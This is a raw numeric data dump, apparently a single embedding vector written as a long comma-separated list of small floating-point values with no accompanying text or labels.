-0.001869680592790246, -0.024889815598726273, 0.029600821435451508, -0.015480889938771725, -0.00010704043961595744, -0.015755698084831238, -0.0031962867360562086, -0.015781870111823082, -0.0061014071106910706, 0.03444268926978111, -0.0035528838634490967, 0.0016349481884390116, -0.005734995473176241, -0.005718638189136982, -0.037347808480262756, -0.04661278799176216, -0.007413291838020086, 0.002052886411547661, -0.036955226212739944, -0.020728427916765213, -0.035044651478528976, 0.021487422287464142, 0.02729766257107258, 0.0011818408966064453, 0.02512536570429802, -0.03172077611088753, 0.029914889484643936, -0.05142848193645477, 0.041247475892305374, 0.01516682282090187, 0.010697909630835056, 0.06731504201889038, 0.013413281179964542, -0.011705541983246803, 0.028606276959180832, 0.02265208773314953, -0.026093740016222, -0.037478670477867126, -0.006081778090447187, 0.02892034314572811, 0.027925796806812286, -0.004452554974704981, 0.006791700609028339, -0.006696826312690973, -0.008996712975203991, 0.00024986325297504663, -0.005761167965829372, 0.030019577592611313, 0.006935648154467344, -0.008368578739464283, -0.04533034935593605, -0.03517551347613335, 0.026106825098395348, 0.015847301110625267, 0.0052148220129311085, 0.0015956897987052798, -0.0216706283390522, -0.0030883261933922768, -0.007838591001927853, 0.01915809139609337, 0.010861486196517944, -0.006507077254354954, 0.00860412884503603, -0.006677196826785803, -0.016619382426142693, -0.016789503395557404, -0.007792789489030838, 0.01442091353237629, 0.017365291714668274, 0.0031979226041585207, 0.05284178629517555, 0.02910354919731617, -0.009173375554382801, 0.006706640589982271, 0.011882204562425613, -0.005034887697547674, 0.012170099653303623, -0.029025033116340637, -0.0013151558814570308, 0.006948734167963266, -0.054019536823034286, 0.018686991184949875, 0.001173662138171494, -0.012111211195588112, -0.030150439590215683, 0.04205881431698799, -0.014080674387514591, -0.016789503395557404, -0.022259503602981567, 0.03198249638080597, 0.033814556896686554, 0.023869097232818604, -0.013367479667067528, 0.03135436400771141, -0.012202814221382141, 0.028161348775029182, 0.005512531381100416, 0.01786256581544876, -0.014669549651443958, -0.04781671240925789, 0.01875242218375206, 0.01932821050286293, -0.015690267086029053, -0.019733881577849388, 0.028423070907592773, -0.011738256551325321, -0.03033364564180374, -0.025884361937642097, -0.016383832320570946, -0.02680039033293724, -0.008852765895426273, 0.017129741609096527, -0.035672783851623535, -0.026957424357533455, -0.013321678154170513, 0.006471090484410524, 0.0030915976967662573, 0.01541545893996954, 0.005322782788425684, 0.008702275343239307, -0.0044231112115085125, 0.038106806576251984, 0.01765318773686886, 0.0030997765716165304, 0.025688068941235542, -0.014865841716527939, 0.011240984313189983, -0.000743455660995096, -0.07171197980642319, 0.0065659647807478905, 0.016567038372159004, 0.004711006302386522, -0.03428565710783005, 0.003211008617654443, -0.043184224516153336, -0.006863674148917198, 0.020728427916765213, 0.00016326989862136543, 0.016161369159817696, 0.006785157602280378, -0.027088284492492676, 0.00006047222632332705, -0.010782969184219837, 0.002810246078297496, -0.009814595803618431, 0.017142828553915024, 0.0021673899609595537, 0.03245359659194946, -0.033421970903873444, -0.021618284285068512, 0.04017441347241402, -0.014473257586359978, -0.04412642493844032, 0.039336901158094406, -0.022612828761339188, -0.0028462328482419252, -0.005015258677303791, -0.025452518835663795, -0.016082851216197014, 0.034782927483320236, -0.010272610932588577, 0.037216950207948685, -0.03198249638080597, -0.016619382426142693, -0.004848410375416279, -0.0495440810918808, -0.0258712749928236, 0.011038148775696754, -0.024170078337192535, 0.019825484603643417, 0.023986872285604477, -0.003778619458898902, 0.01222898717969656, 0.03415479511022568, 0.020362015813589096, -0.014407827518880367, -0.027350008487701416, -0.01561175100505352, 0.0023980329278856516, -0.005800426471978426, 0.00037356806569732726, 0.006386030465364456, 0.0020038133952766657, -0.022403450682759285, -0.0015858751721680164, -0.014211535453796387, 0.0002502721908967942, 0.009297694079577923, 0.005348954815417528, 0.020532134920358658, 0.0008272886625491083, -0.030673883855342865, 0.002666298532858491, -0.007995624095201492, -0.026028309017419815, -0.041509199887514114, -0.02334565296769142, -0.02224641852080822, 0.03174694627523422, 0.025413261726498604, 0.011600852943956852, -0.038499388843774796, 0.00842746626585722, -0.00900325644761324, -0.00477643683552742, 0.0016014149878174067, -0.025177709758281708, 0.034652069211006165, -0.004161388613283634, -0.01871316321194172, 0.013766607269644737, 0.016684813424944878, -0.018451441079378128, 0.04773819446563721, -0.030412161722779274, -0.007033793721348047, -0.031197329983115196, 0.0032306378707289696, -0.026905080303549767, 0.019890915602445602, -0.04428345710039139, -0.004707734566181898, 0.03787125647068024, -0.03386690095067024, 0.003696831176057458, -0.010167921893298626, 0.007616126444190741, 0.01512756384909153, -0.023738237097859383, -0.013275876641273499, -0.01774478890001774, 0.0071253967471420765, -0.044204942882061005, -0.045225657522678375, -0.01570335403084755, 0.006343500688672066, -0.022442709654569626, -0.004377309698611498, -0.013818951323628426, -0.04878508672118187, 0.03245359659194946, 0.011698998510837555, 0.01689419150352478, -0.010128662921488285, -0.022194072604179382, 0.02649940922856331, -0.00946781411767006, -0.05962039902806282, 0.022324934601783752, -0.016109023243188858, 0.02724531851708889, 0.022495053708553314, -0.006909475661814213, -0.00467829080298543, 0.0026286758948117495, 0.004203918855637312, -0.014695721678435802, 0.00485495338216424, 0.0011875660857185721, 0.05412422493100166, 0.014643377624452114, 0.0034972678404301405, -0.006336957681924105, -0.036379437893629074, 0.036824364215135574, -0.002164118457585573, 0.003683745162561536, 0.010710995644330978, 0.04925618693232536, -0.029626993462443352, 0.00982113927602768, -0.021788403391838074, 0.021395819261670113, -0.0327414944767952, -0.005093775223940611, -0.006778614595532417, -0.04017441347241402, -0.03020278364419937, -0.007302059326320887, 0.007936736568808556, -0.01659321039915085, 0.033107902854681015, -0.026250774040818214, -0.008878937922418118, 0.011417646892368793, -0.037216950207948685, -0.026263859122991562, -0.028684793040156364, -0.0032093729823827744, -0.03617005795240402, 0.0026139540132135153, 0.0446760430932045, 0.00025967785040847957, -0.0053031533025205135, 0.0014411098090931773, -0.013557229191064835, -0.013635745272040367, 0.015677182003855705, 0.019341297447681427, 0.017103569582104683, -0.019616106525063515, 0.011999979615211487, 0.026957424357533455, 0.0016619382658973336, 0.03556809574365616, -0.015480889938771725, -0.03289852663874626, -0.012883293442428112, -0.0008505983278155327, -0.0076095834374427795, 0.0022001052275300026, -0.01981239765882492, 0.042922500520944595, 0.012961809523403645, 0.012654285877943039, 0.027664074674248695, -0.0006976542063057423, -0.04949173703789711, -0.01852995716035366, -0.033814556896686554, 0.008990170434117317, -0.033500488847494125, -0.01919735036790371, 0.006124307867139578, -0.01056704856455326, -0.0459846556186676, -0.0017093755304813385, -0.001234185416251421, -0.012974896468222141, -0.0025321657303720713, 0.01413301844149828, -0.0036804736591875553, 0.04268695041537285, -0.023227877914905548, 0.012183185666799545, 0.0183598380535841, -0.009029428474605083, -0.022403450682759285, 0.008708817884325981, 0.014407827518880367, 0.01065865159034729, -0.047397956252098083, 0.01368809025734663, -0.006529978010803461, 0.04302718862891197, -0.021291131153702736, -0.025845102965831757, 0.04828781262040138, 0.002263900125399232, 0.0064841764979064465, 0.003664115909487009, -0.03564661368727684, 0.004782979842275381, -0.0013086128747090697, -0.02729766257107258, -0.05059097334742546, -0.010063232854008675, 0.00588221475481987, 0.008008710108697414, -0.0012448179768398404, -0.02044053189456463, -0.03172077611088753, 0.022442709654569626, 0.0336051769554615, 0.00008725789666641504, 0.0019383827457204461, 0.04006972536444664, 0.008833136409521103, -0.0041842893697321415, 0.007079595234245062, -0.03870876878499985, -0.015768785029649734, 0.030883261933922768, 0.007256258279085159, 0.009297694079577923, 0.023293308913707733, 0.000607278139796108, -0.000003872165052598575, 0.007936736568808556, 0.01468263566493988, -0.024222422391176224, 0.012994525022804737, -0.01654086634516716, 0.001923660864122212, -0.06197590380907059, -0.018372923135757446, 0.02029658481478691, -0.0051395767368376255, -0.0027137359138578176, 0.005021801684051752, 0.022678259760141373, 0.011240984313189983, 0.014473257586359978, 0.0008865852141752839, -0.013740434311330318, 0.029155893251299858, 0.019576847553253174, 0.024667352437973022, 0.02923441119492054, -0.0034089363180100918, -0.04391704499721527, 0.020545221865177155, 0.036641158163547516, 0.01302724052220583, 0.001078787725418806, 0.012994525022804737, 0.03685053810477257, 0.0013356029521673918, -0.013465626165270805, -0.01506213378161192, -0.001070608850568533, 0.006539792753756046, 0.037086088210344315, -0.003490724600851536, 0.005803697742521763, 0.04674364998936653, 0.01439474057406187, 0.008584500290453434, 0.003615042893216014, -0.009291150607168674, 0.05346991866827011, -0.025190796703100204, -0.020728427916765213, 0.0025403446052223444, 0.008146114647388458, -0.005934559274464846, -0.0068047866225242615, -0.014905099757015705, -0.035044651478528976, -0.017090482637286186, -0.027533214539289474, 0.01932821050286293, -0.007975995540618896, -0.030987951904535294, 0.014276965521275997, -0.019877828657627106, -0.003139035077765584, -0.00809377059340477, 0.028004314750432968, 0.030176611617207527, 0.00042080081766471267, 0.011659740470349789, 0.04472838714718819, -0.008708817884325981, 0.00917991902679205, -0.011227898299694061, -0.01240564975887537, -0.012418735772371292, -0.04661278799176216, 0.03575130179524422, 0.021906178444623947, 0.003022895660251379, 0.056950829923152924, -0.011483077891170979, 0.012039237655699253, 0.04504245147109032, 0.020322756841778755, 0.0064089312218129635, -0.0001282031589653343, 0.002550159115344286, -0.005842956248670816, -0.04109044373035431, 0.02949613332748413, -0.010429644025862217, 0.014905099757015705, 0.004540886264294386, -0.004517985973507166, -0.0006359040271490812, 0.0027382723055779934, 0.0021379461977630854, -0.052213650196790695, 0.007655384950339794, -0.011371845379471779, -0.03910135105252266, 0.0018925812328234315, 0.007864763028919697, 0.03145905211567879, -0.034207139164209366, 0.010279153473675251, -0.006418745964765549, -0.005211550742387772, -0.014093760401010513, -0.004570330493152142, 0.01985165663063526, -0.02233802154660225, 0.033552832901477814, -0.014839669689536095, -0.005093775223940611, -0.0028707694727927446, -0.016998879611492157, -0.046508099883794785, -0.02878948114812374, 0.01413301844149828, 0.007779703009873629, 0.017142828553915024, -0.01774478890001774, 0.00450162822380662, 0.01439474057406187, -0.02356811612844467, -0.019079575315117836, -0.016200626268982887, -0.01737837865948677, -0.03263680264353752, 0.0005258987657725811, 0.021330388262867928, 0.005800426471978426, 0.00919954851269722, -0.0109465466812253, -0.021291131153702736, 0.02263900265097618, 0.010691367089748383, -0.03148522600531578, 0.014211535453796387, -0.014185363426804543, -0.003811334725469351, 0.023018499836325645, -0.013714262284338474, -0.012143926694989204, -0.008061055094003677, -0.020715340971946716, 0.004540886264294386, -0.021330388262867928, -0.02600213699042797, -0.012399106286466122, 0.005682650953531265, 0.011057778261601925, -0.027350008487701416, 0.00024127548385877162, 0.006752442102879286, -0.06255169212818146, 0.02834455296397209, -0.013295506127178669, 0.013302049599587917, 0.03300321474671364, -0.017142828553915024, -0.010050146840512753, -0.0071319397538900375, -0.006130850873887539, -0.03486144542694092, -0.02635546214878559, -0.019629191607236862, 0.0008448731387034059, 0.00946781411767006, -0.016619382426142693, -0.006039248313754797, 0.018451441079378128, 0.006274798419326544, -0.019092660397291183, 0.018516872078180313, 0.001869680592790246, -0.012719716876745224, -0.013570315204560757, 0.016266057267785072, 0.030935607850551605, -0.019432900473475456, -0.01229441724717617, 0.02064990997314453, -0.008774248883128166, -0.002000541891902685, -0.004236633889377117, -0.0033304195385426283, -0.019603019580245018, -0.0016832032706588507, -0.005450372584164143, -0.008963997475802898, 0.02640780620276928, -0.024340199306607246, 0.010187550447881222, -0.004442740697413683, 0.012974896468222141, -0.02999340556561947, -0.025714240968227386, 0.006758985109627247, 0.025439433753490448, -0.03378838300704956, 0.00860412884503603, -0.00444601196795702, -0.007491808384656906, 0.015271511860191822, 0.02742852456867695, -0.017666272819042206, 0.009147203527390957, -0.016109023243188858, -0.014761152677237988, 0.011908376589417458, -0.006732813082635403, -0.035358719527721405, -0.015951991081237793, 0.00829006265848875, 0.008479811251163483, 0.02265208773314953, -0.012896379455924034, 0.014944358728826046, -0.035803645849227905, 0.023999959230422974, 0.018909454345703125, 0.006219182629138231, 0.003063789801672101, 0.012798232957720757, 0.0009119395399466157, 0.002285165246576071, 0.0027611730620265007, -0.024889815598726273, 0.010972718708217144, 0.03768805041909218, -0.04635106772184372, 0.028370726853609085, -0.010135206393897533, 0.018189718946814537, -0.0252038836479187, -0.042032644152641296, -0.02087237499654293, -0.013504884205758572, -0.037661876529455185, 0.029339099302887917, -0.0041090440936386585, -0.03601302579045296, 0.0020038133952766657, 0.007236628793179989, 0.020937805995345116, -0.033997759222984314, 0.03559426963329315, -0.021068666130304337, 0.024052303284406662, 0.021696800366044044, -0.014839669689536095, 0.02490290254354477, -0.012968352995812893, -0.01057359203696251, 0.00006236357876332477, 0.017797134816646576, -0.012039237655699253, 0.021618284285068512, -0.02308393083512783, 0.01477423869073391, -0.0012914373073726892, 0.004691376816481352, 0.017967253923416138, -0.003526711603626609, 0.019786225631833076, -0.003363135037943721, 0.02591053396463394, -0.0037491756957024336, -0.0446760430932045, 0.004243176896125078, -0.014447085559368134, 0.002502721967175603, 0.005440557841211557, -0.029574649408459663, 0.036196231842041016, -0.01737837865948677, -0.022573571652173996, 0.023110102862119675, 0.026878906413912773, 0.019733881577849388, 0.01694653555750847, -0.004635761026293039, -0.0005377580528147519, 0.013197360560297966, 0.030752401798963547, -0.02109483815729618, 0.046063169836997986, -0.0280828308314085, -0.010848400183022022, 0.021866919472813606, -0.02724531851708889, 0.02905120514333248, 0.013374023139476776, -0.01260194182395935, 0.025243140757083893, 0.004331508651375771, 0.0225604847073555, -0.023515772074460983, 0.00510686170309782, -0.015049047768115997, 0.02432711236178875, 0.011522335931658745, -0.007832047529518604, -0.04763350635766983, 0.037478670477867126, -0.03326493874192238, 0.014983616769313812, -0.03386690095067024, -0.005427471827715635, 0.00650380551815033, -0.03391924500465393, -0.010095948353409767, -0.009670648723840714, -0.03258445858955383, 0.01892254129052162, 0.002435655565932393, 0.005620492156594992, 0.01928895339369774, 0.022835293784737587, 0.031773120164871216, -0.02512536570429802, -0.014983616769313812, -0.032348908483982086, 0.01056704856455326, -0.017038138583302498, 0.010416558012366295, 0.013805865310132504, -0.044649869203567505, -0.005689194425940514, 0.010023973882198334, -0.03787125647068024, 0.019799312576651573, -0.03179929032921791, 0.016174454241991043, 0.0014901828253641725, -0.013105757534503937, -0.050538625568151474, 0.004004355054348707, -0.005401299335062504, -0.03389307111501694, -0.013321678154170513, -0.00990619882941246, 0.014656463637948036, 0.024601921439170837, 0.015860388055443764, 0.0034220225643366575, -0.00353325461037457, 0.0004351137613411993, -0.017103569582104683, 0.022455796599388123, -0.00964447669684887, 0.02105558104813099, -0.014368568547070026, -0.020204981788992882, 0.013923640362918377, -0.00726280128583312, 0.019707709550857544, -0.028449242934584618, -0.011993436142802238, 0.0011491256300359964, 0.003103048074990511, -0.015559406019747257, -0.0637032687664032, -0.01694653555750847, -0.033238764852285385, 0.0026728417724370956, -0.0028691336046904325, 0.019694622606039047, 0.01497053075581789, -0.03562043979763985, -0.0060948641039431095, 0.007740444969385862, -0.008505983278155327, 0.02852775901556015, -0.003392578801140189, 0.017980340868234634, -0.016619382426142693, -0.0041842893697321415, 0.008054511621594429, -0.03528020158410072, -0.019040316343307495, -0.019838569685816765, 0.007491808384656906, -0.002872405108064413, 0.06307514011859894, -0.01858230121433735, 0.011509249918162823, -0.006673925556242466, 0.040985751897096634, 0.009801509790122509, -0.03564661368727684, 0.004230090882629156, -0.0004817330918740481, 0.009493986144661903, 0.002946014516055584, 0.017980340868234634, -0.0101744644343853, -0.003281346755102277, 0.009363125078380108, -0.0018467798363417387, -0.0020168994087725878, 0.014263879507780075, 0.014852755703032017, 0.0172475166618824, -0.04140450805425644, 0.0020692439284175634, 0.009507072158157825, -0.01008286140859127, -0.024955246597528458, -0.004112315829843283, 0.03902283310890198, 0.015781870111823082, -0.0022491782438009977, -0.01822897605597973, 0.00034882710315287113, 0.004936741665005684, -0.009670648723840714, -0.013249704614281654, -0.025190796703100204, -0.041195131838321686, 0.0459846556186676, -0.02122570015490055, -0.012922551482915878, -0.0052213650196790695, -0.010226809419691563, 0.0022688074968755245, 0.020597565919160843, -0.005502717103809118, -0.018477613106369972, 0.012111211195588112, 0.017273688688874245, -0.02375132218003273, 0.02644706517457962, -0.0019449257524684072, -0.026957424357533455, 0.020505962893366814, -0.03033364564180374, -0.02356811612844467, 0.04475455731153488, 0.020911632105708122, 0.02153976634144783, 0.021435078233480453, -0.004452554974704981, -0.00935658160597086, -0.01756158471107483, -0.018451441079378128, -0.0415877141058445, 0.04043613746762276, 0.009094859473407269, 0.007701186463236809, -0.009238806553184986, -0.0033729495480656624, 0.009546330198645592, -0.00926497858017683, 0.010717539116740227, 0.016514694318175316, -0.0024569204542785883, -0.01452560257166624, -0.02512536570429802, 0.00823117420077324, -0.005414385348558426, -0.016200626268982887, -0.009559416212141514, 0.013949812389910221, -0.017679359763860703, -0.034835271537303925, -0.019092660397291183, 0.009035971947014332, 0.01048198901116848, -0.0012783511774614453, 0.05072183161973953, 0.034076277166604996, -0.002905120374634862, -0.0033533202949911356, 0.0021804762072861195, 0.007230085786432028, -0.0349399633705616, 0.004917112644761801, -0.005970546044409275, -0.029731683433055878, 0.006186467129737139, 0.03729546442627907, -0.019760053604841232, 0.01194109208881855, 0.03174694627523422, 0.016619382426142693, 0.004059971310198307, -0.025766586884856224, -0.0017290046671405435, 0.0046553900465369225, 0.0014541959390044212, -0.0056172204203903675, 0.006765528116375208, 0.004148302599787712, 0.030935607850551605, -0.009683734737336636, 0.004593230783939362, 0.023227877914905548, 0.019249694421887398, 0.0029247496277093887, -0.017770962789654732, 0.01092691719532013, -0.021997781470417976, -0.006075235083699226, 0.0013666824670508504, 0.028763309121131897, 0.011398017406463623, -0.05161168798804283, -0.006552878767251968, 0.004282435402274132, 0.0074460068717598915, 0.021906178444623947, -0.006994535680860281, -0.010442730039358139, -0.016815675422549248, 0.01313847303390503, 0.006255169399082661, 0.026682615280151367, -0.013478712178766727, 0.013714262284338474, 0.00178625644184649, -0.013275876641273499, -0.0037001026794314384, -0.0012284602271392941, 0.009814595803618431, -0.011411103419959545, -0.031642258167266846, 0.006598680280148983, -0.004432925954461098, -0.01750923879444599, -0.0144863435998559, -0.024078475311398506, 0.009559416212141514, -0.0214481633156538, 0.008414380252361298, 0.024052303284406662, 0.008597586303949356, -0.009336952120065689, -0.02729766257107258, 0.02263900265097618, -0.017522325739264488, 0.010940003208816051, -0.007367490325123072, 0.015533233992755413, -0.012418735772371292, 0.0026842921506613493, -0.01565100997686386, 0.009415469132363796, 0.01240564975887537, -0.031563740223646164, 0.013158101588487625, 0.006451460998505354, -0.022625915706157684, -0.015951991081237793, 0.006850588135421276, -0.010416558012366295, -0.010717539116740227, -0.006117764860391617, 0.008008710108697414, -0.03551575168967247, 0.01256268285214901, 0.039336901158094406, 0.07014165073633194, 0.0002517034881748259, 0.013517970219254494, 0.01275897491723299, -0.009808053262531757, -0.006268255412578583, -0.009565959684550762, 0.015690267086029053, 0.02295306883752346, 0.005859313998371363, 0.012248615734279156, -0.009232263080775738, 0.0012031059013679624, 0.02657792717218399, 0.004557244013994932, 0.007904021069407463, 0.015951991081237793, 0.002188654849305749, 0.017666272819042206, 0.006098135840147734, -0.006284613162279129, 0.01756158471107483, 0.010652108117938042, -0.0008620487060397863, 0.0008555056410841644, -0.002600867999717593, -0.010030517354607582, -0.009618304669857025, -0.008630301803350449, -0.005100318230688572, -0.018019597977399826, -0.008486353792250156, -0.019524503499269485, -0.014538688585162163, 0.011116665787994862, 0.016553951427340508, 0.027978142723441124, 0.000825652910862118, 0.0135964872315526, -0.03211335837841034, 0.004756807815283537, -0.015886560082435608, -0.00021898817794863135, -0.007419834844768047, -0.015153736807405949, -0.03158991411328316, 0.012516881339251995, 0.007393662352114916, -0.004351137671619654, -0.010095948353409767, 0.002463463693857193, -0.014355482533574104, 0.01720825769007206, 0.07176432758569717, -0.01871316321194172, 0.008505983278155327, -0.0018124287016689777, 0.016750244423747063, -0.007576868403702974, -0.03096177987754345, 0.016815675422549248, -0.003513625357300043, 0.015454716980457306, -0.0071253967471420765, -0.009899656288325787, -0.004393667448312044, -0.02282220683991909, 0.010207179933786392, -0.00013065681559965014, 0.014499429613351822, -0.0018304222030565143, -0.006392573472112417, 0.02776876464486122, -0.002803703071549535, 0.019040316343307495, 0.02410464733839035, -0.019825484603643417, 0.014983616769313812, -0.034338001161813736, -0.0014615569962188601, 0.04030527547001839, 0.021749144420027733, -0.01765318773686886, -0.012287874706089497, -0.012150470167398453, 0.026734959334135056, -0.005640121176838875, 0.011986893601715565, 0.0031324918381869793, 0.0021035950630903244, -0.0008207455975934863, -0.016292229294776917, 0.004841867368668318, 0.0011008705478161573, -0.012700087390840054, 0.0011540328850969672, 0.015153736807405949, -0.0030408890452235937, 0.014944358728826046, 0.0007148297736421227, -0.013099214062094688, 0.0006232268642634153, 0.002523987088352442, 0.005695737432688475, -0.020689168944954872, 0.029600821435451508, 0.001527805463410914, 0.029731683433055878, 0.012451451271772385, 0.006628124043345451, 0.0068047866225242615, -0.008617215789854527, -0.0015866929898038507, -0.03161608427762985, -0.0009176647290587425, -0.024405628442764282, 0.014577946625649929, 0.012425278313457966, 0.0038931232411414385, -0.020401272922754288, 0.000018824088328983635, -0.005770982708781958, -0.002995087532326579, -0.0017633558018133044, 0.0006502169999293983, -0.008519069291651249, -0.0023587746545672417, -0.02228567562997341, 0.012176642194390297, 0.03203484043478966, 0.007622669450938702, -0.015035961754620075, 0.0004289796343073249, -0.00937621109187603, 0.03781890869140625, -0.014826583676040173, 0.013832037337124348, 0.010167921893298626, 0.00864338781684637, -0.002818424953147769, -0.001609593746252358, 0.029025033116340637, 0.008767706342041492, 0.009808053262531757, 0.026734959334135056, -0.0021543039474636316, -0.012425278313457966, 0.021343475207686424, 0.025661896914243698, 0.0014206627383828163, -0.009022885002195835, -0.012085039168596268, 0.03397158905863762, 0.04307953268289566, 0.004406753461807966, 0.009932370856404305, -0.002519079716876149, -0.027140630409121513, -0.018726250156760216, 0.018111201003193855, 0.001549070468172431, 0.025282399728894234, 0.050172217190265656, 0.010135206393897533, -0.002216462977230549, 0.0271929744631052, -0.008414380252361298, -0.022455796599388123, -0.03818532079458237, -0.04587996378540993, -0.028763309121131897, 0.04396938905119896, -0.01906648837029934, -0.009873483330011368, 0.0017077397787943482, 0.0068178726360201836, -0.011345673352479935, -0.02410464733839035, -0.004887668881565332, 0.017195172607898712, -0.0006915201083756983, 0.0049760001711547375, -0.03326493874192238, -0.02282220683991909, 0.03135436400771141, -0.03459972143173218, 0.008034883067011833, 0.027350008487701416, -0.02737618051469326, 0.021618284285068512, 0.002407847670838237, 0.007020707707852125, -0.02007411979138851, -0.020885460078716278, -0.007485265377908945, -0.0056237634271383286, -0.0026777489110827446, -0.016344573348760605, 0.018058856949210167, -0.03166843205690384, 0.009703364223241806, 0.007033793721348047, 0.005892029032111168, -0.013367479667067528, 0.02834455296397209, 0.001958011882379651, 0.0087349908426404, -0.002810246078297496, 0.01010903436690569, 0.00011194773833267391, -0.013544142246246338, 0.026957424357533455, 0.008970540948212147, 0.03658881410956383, 0.009742622263729572, 0.00028339645359665155, 0.02007411979138851, -0.01817663200199604, 0.0027317292988300323, 0.01866081915795803, -0.025400174781680107, 0.0062453546561300755, 0.014564860612154007, -0.0029345641378313303, -0.03391924500465393, 0.018726250156760216, 0.015035961754620075, 0.0018255148315802217, -0.03813297674059868, 0.009932370856404305, -0.007230085786432028, -0.014237707480788231, -0.0006518527516163886, 0.006837502121925354, -0.018255148082971573, -0.014237707480788231, 0.017312947660684586, 0.0031275846995413303, 0.03428565710783005, -0.04758116230368614, 0.014407827518880367, 0.01866081915795803, -0.014852755703032017, -0.00600326107814908, -0.007367490325123072, -0.00018392143829260021, 0.00871536135673523, 0.01461720559746027, 0.0020136279053986073, 0.014237707480788231, -0.0023276950232684612, 0.005038159433752298, 0.005155934486538172, 0.012700087390840054, -0.015781870111823082, 0.02202395349740982, 0.01256268285214901, -0.020008690655231476, -0.007302059326320887, -0.0032633531372994184, 0.014748066663742065, -0.0004248902259860188, -0.0027137359138578176, -0.0003181564970873296, -0.020846202969551086, 0.02083311602473259, -0.033945415169000626, 0.004171203356236219, -0.0026630270294845104, -0.002087237546220422, -0.014146104454994202, -0.015088305808603764, -0.01368809025734663, 0.0008808600250631571, 0.00450162822380662, 0.0012709902366623282, -0.005640121176838875, -0.001930203870870173, -0.0010951453587040305, 0.00448854174464941, 0.009049057960510254, 0.030045749619603157, -0.003027802798897028, -0.02025732584297657, -0.02711445838212967, 0.015206080861389637, -0.013871296308934689, 0.00407960033044219, -0.008329320698976517, -0.01737837865948677, 0.012340218760073185, 0.001256268355064094, -0.008414380252361298, -0.006719726603478193, 0.014643377624452114, 0.018870197236537933, -0.02839689888060093, 0.03326493874192238, -0.01932821050286293, -0.007158112246543169, 0.003772076452150941, 0.009592131711542606, 0.008944368921220303, 0.0077535309828817844, 0.004848410375416279, 0.019733881577849388, -0.005450372584164143, -0.019576847553253174, 0.014878927730023861, -0.0012178277829661965, 0.01099234726279974, -0.016161369159817696, -0.007184284273535013, -0.011267156340181828, 0.006883303634822369, 0.007216999772936106, -0.006857131142169237, 0.01648852229118347, 0.02127804420888424, -0.020204981788992882, -0.0016881105257198215, 0.014538688585162163, 0.00836203619837761, -0.0336051769554615, -0.03145905211567879, 0.011515792459249496, 0.012634656392037868, 0.018569216132164, 0.0034023933112621307, -0.01240564975887537, 0.008512526750564575, 0.02570115588605404, -0.004871311131864786, 0.0000545936927665025, 0.01429005153477192, -0.00906868651509285, 0.005119947716593742, 0.027271490544080734, -0.0002668343367986381, -0.013334764167666435, -0.004701191559433937, 0.034521207213401794, -0.02193235047161579, -0.004043613560497761, 0.006994535680860281, -0.0027448153123259544, -0.0015703353565186262, 0.011378388851881027, -0.005407842341810465, 0.011312957853078842, -0.015520147979259491, -0.0172475166618824, -0.007190827280282974, 0.02397378720343113, 0.009448184631764889, 0.019760053604841232, -0.004714277572929859, -0.016396919265389442, -0.011234440840780735, -0.05564221739768982, -0.004122130572795868, -0.036824364215135574, 0.025596465915441513, 0.005555061623454094, -0.008708817884325981, 0.013086128048598766, -0.005136305466294289, 0.004305336158722639, -0.02574041485786438, -0.02490290254354477, 0.008492897264659405, 0.002551794983446598, -0.014957444742321968, -0.014630291610956192, 0.03444268926978111, -0.003418751060962677, 0.009212634526193142, 0.0038833084981888533, -0.015598664991557598, -0.00047968837316147983, 0.0020790586713701487, 0.0018664090894162655, 0.021304216235876083, 0.01879167929291725, -0.020047947764396667, -0.004625946283340454, -0.017679359763860703, 0.01388438232243061, -0.006608494557440281, 0.008702275343239307, -0.001992363017052412, -0.002723550423979759, 0.0016930177807807922, 0.03763570636510849, -0.003615042893216014, -0.004413296934217215, 0.01737837865948677, 0.0077535309828817844, -0.023908356204628944, 0.017182085663080215, 0.0013053412549197674, 0.021736059337854385, -0.008028339594602585, 0.009984715841710567, 0.0005357133923098445, 0.00946781411767006, -0.009206091053783894, -0.013923640362918377, 0.022442709654569626, 0.01324316207319498, 0.02949613332748413, 0.02150050923228264, 0.015559406019747257, 0.015075219795107841, 0.015912732109427452, -0.002345688408240676, -0.021592112258076668, -0.022717518731951714, -0.023384911939501762, 0.012333676218986511, 0.022167900577187538, 0.032348908483982086, 0.000395650917198509, -0.02570115588605404, 0.020152637735009193, -0.00319465110078454, -0.009022885002195835, -0.039336901158094406, 0.02241653762757778, 0.003814606461673975, 0.005564875900745392, 0.028318380936980247, -0.0015384379075840116, 0.004514714237302542, -0.008963997475802898, 0.01650160737335682, -0.001617772621102631, 0.00999780185520649, -0.0014959080144762993, -0.00964447669684887, 0.024523403495550156, -0.0032993401400744915, -0.006539792753756046, -0.008329320698976517, 0.009664105251431465, -0.01512756384909153, -0.010298782959580421, 0.014303138479590416, 0.0016864747740328312, 0.0038931232411414385, 0.013046870008111, -0.007668470963835716, -0.0016357660060748458, 0.007171198260039091, -0.009075229987502098, 0.02241653762757778, 0.012765518389642239, -0.008813506923615932, 0.0006735266651958227, 0.0012538146693259478, 0.011869118548929691, -0.016868019476532936, 0.012124298140406609, 0.0043413229286670685, -0.002913299249485135, 0.02136964723467827, -0.011469990946352482, 0.0012505431659519672, -0.00343838008120656, -0.02475895546376705, 0.0181373730301857, 0.00009921943274093792, 0.004606317263096571, -0.010763340629637241, -0.01663246937096119, -0.01311230007559061, 0.007884392514824867, -0.02300541289150715, -0.0038440502248704433, -0.0032829823903739452, 0.01672407239675522, 0.031144985929131508, 0.008774248883128166, -0.006719726603478193, 0.0012505431659519672, 0.03334345296025276, 0.012215900234878063, 0.002538708969950676, -0.007812418509274721, -0.004046885296702385, -0.03224422037601471, 0.009219177067279816, -0.022194072604179382, 0.007046880200505257, 0.010200636461377144, -0.0064907195046544075, -0.010181007906794548, 0.01541545893996954, 0.0011892019538208842, -0.013073042035102844, -0.018647732213139534, 0.0037197319325059652, -0.00171919004060328, -0.00454415800049901, 0.0075964974239468575, -0.007799332495778799, -0.0018582302145659924, -0.016527779400348663, 0.0019122104858979583, -0.00882005039602518, 0.008577956818044186, -0.006513620261102915, 0.009794967249035835, 0.004056699573993683, -0.002810246078297496, 0.0066542960703372955, 0.001371589838527143, 0.01541545893996954, -0.012687001377344131, -0.02118644118309021, -0.009991259314119816, 0.00245528481900692, 0.014185363426804543, -0.004285707138478756, -0.00665756780654192, 0.006758985109627247, -0.020375100895762444, 0.01512756384909153, -0.01605667918920517, -0.019249694421887398, 0.015821129083633423, -0.01506213378161192, -0.005054517183452845, -0.04784288629889488, 0.0032502671238034964, 0.007485265377908945, 0.027847280725836754, -0.014433999545872211, 0.01229441724717617, -0.017496153712272644, 0.005368584301322699, -0.016972707584500313, 